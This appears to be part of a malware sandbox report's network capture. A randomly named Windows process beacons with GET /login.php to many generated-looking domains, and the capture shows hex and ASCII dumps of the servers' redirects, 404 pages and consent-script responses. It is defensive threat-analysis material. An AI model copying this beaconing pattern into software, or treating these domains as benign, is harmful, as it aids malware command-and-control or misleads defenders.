                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                  116192.168.2.659225162.255.119.102801476C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe
                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                  Nov 11, 2024 18:51:26.952080965 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: gahyqah.com
                                                                                                                                                                                                                  Nov 11, 2024 18:51:27.123919964 CET303INHTTP/1.1 302 Found
                                                                                                                                                                                                                  Date: Mon, 11 Nov 2024 17:51:27 GMT
                                                                                                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                  Content-Length: 55
                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                  Location: http://www.gahyqah.com/login.php
                                                                                                                                                                                                                  X-Served-By: Namecheap URL Forward
                                                                                                                                                                                                                  Server: namecheap-nginx
                                                                                                                                                                                                                  Data Raw: 3c 61 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 77 77 77 2e 67 61 68 79 71 61 68 2e 63 6f 6d 2f 6c 6f 67 69 6e 2e 70 68 70 27 3e 46 6f 75 6e 64 3c 2f 61 3e 2e 0a 0a
                                                                                                                                                                                                                  Data Ascii: <a href='http://www.gahyqah.com/login.php'>Found</a>.


                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                  117192.168.2.65923318.208.156.24880
                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                  Nov 11, 2024 18:51:32.485188007 CET353OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: vonypom.com
                                                                                                                                                                                                                  Cookie: snkz=66.23.206.109; btst=540e8cd587688b22b6a34721957e6de0|66.23.206.109|1731347463|1731347428|17|2|0
                                                                                                                                                                                                                  Nov 11, 2024 18:51:32.853944063 CET335INHTTP/1.1 200 OK
                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                  Date: Mon, 11 Nov 2024 17:51:32 GMT
                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                  Set-Cookie: btst=540e8cd587688b22b6a34721957e6de0|66.23.206.109|1731347492|1731347428|23|3|0; path=/; domain=.vonypom.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                  118192.168.2.659236154.212.231.82801476C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe
                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                  Nov 11, 2024 18:51:33.644757986 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: gadyniw.com
                                                                                                                                                                                                                  Nov 11, 2024 18:51:34.630713940 CET696INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                  Date: Mon, 11 Nov 2024 17:51:34 GMT
                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                  Content-Length: 548
                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                                                                                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                                                                                                                                                  Nov 11, 2024 18:51:34.873492956 CET696INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                  Date: Mon, 11 Nov 2024 17:51:34 GMT
                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                  Content-Length: 548
                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                                                                                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                  119192.168.2.65923744.221.84.105801476C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe
                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                  Nov 11, 2024 18:51:33.645417929 CET352OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: vocyzit.com
                                                                                                                                                                                                                  Cookie: snkz=66.23.206.109; btst=39d16f88231e9d77c030571879e36c23|66.23.206.109|1731347479|1731347428|9|4|0
                                                                                                                                                                                                                  Nov 11, 2024 18:51:34.292531013 CET335INHTTP/1.1 200 OK
                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                  Date: Mon, 11 Nov 2024 17:51:34 GMT
                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                  Set-Cookie: btst=39d16f88231e9d77c030571879e36c23|66.23.206.109|1731347494|1731347428|12|5|0; path=/; domain=.vocyzit.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                  120192.168.2.65923599.83.170.380
                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                  Nov 11, 2024 18:51:33.645505905 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: puzylyp.com
                                                                                                                                                                                                                  Nov 11, 2024 18:51:34.292500973 CET166INHTTP/1.1 308 Permanent Redirect
                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                  Location: https://puzylyp.com/login.php
                                                                                                                                                                                                                  Server: Caddy
                                                                                                                                                                                                                  Date: Mon, 11 Nov 2024 17:51:34 GMT
                                                                                                                                                                                                                  Content-Length: 0


                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                  121192.168.2.659238178.162.203.226801476C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe
                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                  Nov 11, 2024 18:51:33.649336100 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: gatyfus.com


                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                  122192.168.2.659239188.114.96.3801476C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe
                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                  Nov 11, 2024 18:51:33.651628971 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: qegyhig.com
                                                                                                                                                                                                                  Nov 11, 2024 18:51:34.334598064 CET968INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                  Date: Mon, 11 Nov 2024 17:51:34 GMT
                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                  Location: https://qegyhig.com/login.php
                                                                                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rbXXkMqCAWLDknBr9LMBigOBdtNtAT9Mj0QW0o6IsYf3AyPK7zuk4il1%2FP5ka3TZm%2BWVGtjDumgDMf7P9R1HEcia8xLK%2FWOrXqUv4oWTwIl9a9k090ijAF37ndsAiQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                  CF-RAY: 8e10218d9e0d424b-EWR
                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1205&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=243&delivery_rate=0&cwnd=248&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                                                  Data Raw: 61 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                  Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>0


                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                  123192.168.2.6592413.94.10.34801476C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe
                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                  Nov 11, 2024 18:51:33.699893951 CET352OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: lymyxid.com
                                                                                                                                                                                                                  Cookie: snkz=66.23.206.109; btst=3f95d6b3439c1d0f64626ac83ec297f1|66.23.206.109|1731347479|1731347428|9|4|0
                                                                                                                                                                                                                  Nov 11, 2024 18:51:34.292635918 CET335INHTTP/1.1 200 OK
                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                  Date: Mon, 11 Nov 2024 17:51:34 GMT
                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                  Set-Cookie: btst=3f95d6b3439c1d0f64626ac83ec297f1|66.23.206.109|1731347494|1731347428|12|5|0; path=/; domain=.lymyxid.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                  124192.168.2.659240199.191.50.83801476C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe
                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                  Nov 11, 2024 18:51:33.719090939 CET281OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: galyqaz.com
                                                                                                                                                                                                                  Cookie: vsid=903vr478893028933998491
                                                                                                                                                                                                                  Nov 11, 2024 18:51:36.199882984 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                  Date: Mon, 11 Nov 2024 17:51:34 GMT
                                                                                                                                                                                                                  Server: Apache
                                                                                                                                                                                                                  Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                                                                  Accept-CH: Sec-CH-Save-Data, Sec-CH-DPR, Sec-CH-Width, Sec-CH-Viewport-Width, Sec-CH-Viewport-Height, Sec-CH-Device-Memory, Sec-CH-RTT, Sec-CH-Downlink, Sec-CH-ECT, Sec-CH-Prefers-Color-Scheme, Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                  Permissions-Policy: ch-ua-platform-version=("https://dts.gnpge.com"), ch-ua-model=("https://dts.gnpge.com")
                                                                                                                                                                                                                  X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_NHOnw0G73BscnvIcyf8HaXYxUwB52N5y4R2rV77ldfg6F/P3HTMIgnr4aIPWR/fyPGslgb3huQzNdSH/7sK+hw==
                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                  Data Raw: 61 38 65 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 65 6c 69 76 65 72 79 2e 63 6f 6e 73 65 6e 74 6d 61 6e 61 67 65 72 2e 6e 65 74 22 3e 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 63 6f 6e 73 65 6e 74 6d 61 6e 61 67 65 72 2e 6e 65 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 63 6d 70 5f 73 74 61 79 69 6e 69 66 72 61 6d 65 20 3d 20 31 3b 20 77 69 6e 64 6f 77 2e 63 6d 70 5f 64 6f 6e 74 6c 6f 61 64 69 6e 69 66 72 61 6d 65 20 3d 20 74 72 75 65 3b 20 69 66 28 [TRUNCATED]
                                                                                                                                                                                                                  Data Ascii: a8e0<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><link rel="preconnect" href="https://delivery.consentmanager.net"> <link rel="preconnect" href="https://cdn.consentmanager.net"> <script>window.cmp_stayiniframe = 1; window.cmp_dontloadiniframe = true; if(!"gdprAppliesGlobally" in window){window.gdprAppliesGlobally=true}i
                                                                                                                                                                                                                  Nov 11, 2024 18:51:36.199942112 CET1236INData Raw: 66 28 21 28 22 63 6d 70 5f 69 64 22 20 69 6e 20 77 69 6e 64 6f 77 29 7c 7c 77 69 6e 64 6f 77 2e 63 6d 70 5f 69 64 3c 31 29 7b 77 69 6e 64 6f 77 2e 63 6d 70 5f 69 64 3d 30 7d 69 66 28 21 28 22 63 6d 70 5f 63 64 69 64 22 20 69 6e 20 77 69 6e 64 6f
                                                                                                                                                                                                                  Data Ascii: f(!("cmp_id" in window)||window.cmp_id<1){window.cmp_id=0}if(!("cmp_cdid" in window)){window.cmp_cdid="21fdca2281833"}if(!("cmp_params" in window)){window.cmp_params=""}if(!("cmp_host" in window)){window.cmp_host="a.delivery.consentmanager.net
                                                                                                                                                                                                                  Nov 11, 2024 18:51:36.199954987 CET358INData Raw: 65 64 4c 61 6e 67 73 28 29 3b 76 61 72 20 63 3d 5b 5d 3b 76 61 72 20 66 3d 6c 6f 63 61 74 69 6f 6e 2e 68 61 73 68 3b 76 61 72 20 65 3d 6c 6f 63 61 74 69 6f 6e 2e 73 65 61 72 63 68 3b 76 61 72 20 61 3d 22 6c 61 6e 67 75 61 67 65 73 22 20 69 6e 20
                                                                                                                                                                                                                  Data Ascii: edLangs();var c=[];var f=location.hash;var e=location.search;var a="languages" in navigator?navigator.languages:[];if(f.indexOf("cmplang=")!=-1){c.push(f.substr(f.indexOf("cmplang=")+8,2).toUpperCase())}else{if(e.indexOf("cmplang=")!=-1){c.pus
                                                                                                                                                                                                                  Nov 11, 2024 18:51:36.200155973 CET1236INData Raw: 68 28 77 69 6e 64 6f 77 2e 63 6d 70 5f 73 65 74 6c 61 6e 67 2e 74 6f 55 70 70 65 72 43 61 73 65 28 29 29 7d 65 6c 73 65 7b 69 66 28 61 2e 6c 65 6e 67 74 68 3e 30 29 7b 66 6f 72 28 76 61 72 20 64 3d 30 3b 64 3c 61 2e 6c 65 6e 67 74 68 3b 64 2b 2b
                                                                                                                                                                                                                  Data Ascii: h(window.cmp_setlang.toUpperCase())}else{if(a.length>0){for(var d=0;d<a.length;d++){c.push(a[d])}}}}}if("language" in navigator){c.push(navigator.language)}if("userLanguage" in navigator){c.push(navigator.userLanguage)}var h="";for(var d=0;d<c
                                                                                                                                                                                                                  Nov 11, 2024 18:51:36.200351954 CET1236INData Raw: 6d 70 5f 72 65 66 22 20 69 6e 20 68 29 3f 68 2e 63 6d 70 5f 72 65 66 3a 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3b 76 61 72 20 6a 3d 75 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 6a 2e 73 65 74 41 74 74 72 69 62 75
                                                                                                                                                                                                                  Data Ascii: mp_ref" in h)?h.cmp_ref:location.href;var j=u.createElement("script");j.setAttribute("data-cmp-ab","1");var c=x("cmpdesign","cmp_design" in h?h.cmp_design:"");var f=x("cmpregulationkey","cmp_regulationkey" in h?h.cmp_regulationkey:"");var r=x(
                                                                                                                                                                                                                  Nov 11, 2024 18:51:36.200366020 CET1236INData Raw: 75 6e 6d 69 6e 69 6d 69 7a 65 64 22 20 69 6e 20 68 3f 68 2e 63 6d 70 64 65 62 75 67 75 6e 6d 69 6e 69 6d 69 7a 65 64 3a 30 29 3e 30 3f 22 22 3a 22 2e 6d 69 6e 22 3b 76 61 72 20 61 3d 78 28 22 63 6d 70 64 65 62 75 67 63 6f 76 65 72 61 67 65 22 2c
                                                                                                                                                                                                                  Data Ascii: unminimized" in h?h.cmpdebugunminimized:0)>0?"":".min";var a=x("cmpdebugcoverage","cmp_debugcoverage" in h?h.cmp_debugcoverage:"");if(a=="1"){m="instrumented";p=""}var j=u.createElement("script");j.src=k+"//"+h.cmp_cdn+"/delivery/"+m+"/cmp"+b+
                                                                                                                                                                                                                  Nov 11, 2024 18:51:36.200726032 CET1236INData Raw: 3b 77 68 69 6c 65 28 62 2e 73 75 62 73 74 72 28 30 2c 31 29 3d 3d 22 20 22 29 7b 62 3d 62 2e 73 75 62 73 74 72 28 31 2c 62 2e 6c 65 6e 67 74 68 29 7d 76 61 72 20 67 3d 62 2e 73 75 62 73 74 72 69 6e 67 28 30 2c 62 2e 69 6e 64 65 78 4f 66 28 22 3d
                                                                                                                                                                                                                  Data Ascii: ;while(b.substr(0,1)==" "){b=b.substr(1,b.length)}var g=b.substring(0,b.indexOf("="));if(b.indexOf(";")!=-1){var c=b.substring(b.indexOf("=")+1,b.indexOf(";"))}else{var c=b.substr(b.indexOf("=")+1,b.length)}if(h==g){f=c}var e=b.indexOf(";")+1;
                                                                                                                                                                                                                  Nov 11, 2024 18:51:36.200737953 CET1236INData Raw: 5b 32 5d 3a 6e 75 6c 6c 3b 69 66 28 67 3d 3d 3d 22 70 69 6e 67 22 29 7b 72 65 74 75 72 6e 20 77 69 6e 64 6f 77 2e 63 6d 70 5f 67 70 70 5f 70 69 6e 67 28 29 7d 65 6c 73 65 7b 69 66 28 67 3d 3d 3d 22 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72
                                                                                                                                                                                                                  Data Ascii: [2]:null;if(g==="ping"){return window.cmp_gpp_ping()}else{if(g==="addEventListener"){__gpp.e=__gpp.e||[];if(!("lastId" in __gpp)){__gpp.lastId=0}__gpp.lastId++;var c=__gpp.lastId;__gpp.e.push({id:c,callback:f});return{eventName:"listenerRegist
                                                                                                                                                                                                                  Nov 11, 2024 18:51:36.200750113 CET1236INData Raw: 6c 3b 77 69 6e 64 6f 77 2e 5f 5f 75 73 70 61 70 69 28 62 2e 63 6f 6d 6d 61 6e 64 2c 62 2e 76 65 72 73 69 6f 6e 2c 66 75 6e 63 74 69 6f 6e 28 68 2c 67 29 7b 76 61 72 20 65 3d 7b 5f 5f 75 73 70 61 70 69 52 65 74 75 72 6e 3a 7b 72 65 74 75 72 6e 56
                                                                                                                                                                                                                  Data Ascii: l;window.__uspapi(b.command,b.version,function(h,g){var e={__uspapiReturn:{returnValue:h,success:g,callId:b.callId}};d.source.postMessage(a?JSON.stringify(e):e,"*")})}if(typeof(c)==="object"&&c!==null&&"__tcfapiCall" in c){var b=c.__tcfapiCall
                                                                                                                                                                                                                  Nov 11, 2024 18:51:36.200762987 CET1074INData Raw: 6d 73 67 68 61 6e 64 6c 65 72 3b 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 6d 65 73 73 61 67 65 22 2c 77 69 6e 64 6f 77 2e 63 6d 70 5f 6d 73 67 68 61 6e 64 6c 65 72 2c 66 61 6c 73 65 29 7d 7d 3b 77 69 6e 64 6f 77
                                                                                                                                                                                                                  Data Ascii: msghandler;window.addEventListener("message",window.cmp_msghandler,false)}};window.cmp_addFrame("__cmpLocator");if(!("cmp_disableusp" in window)||!window.cmp_disableusp){window.cmp_addFrame("__uspapiLocator")}if(!("cmp_disabletcf" in window)||
                                                                                                                                                                                                                  Nov 11, 2024 18:51:36.205306053 CET1236INData Raw: 78 22 3b 69 6d 67 6c 6f 67 2e 73 72 63 3d 22 68 74 74 70 3a 2f 2f 67 61 6c 79 71 61 7a 2e 63 6f 6d 2f 73 6b 2d 6c 6f 67 61 62 70 73 74 61 74 75 73 2e 70 68 70 3f 61 3d 64 44 5a 77 63 7a 68 4b 5a 6a 5a 32 4e 69 73 34 51 30 56 6a 51 6c 4a 44 4e 7a
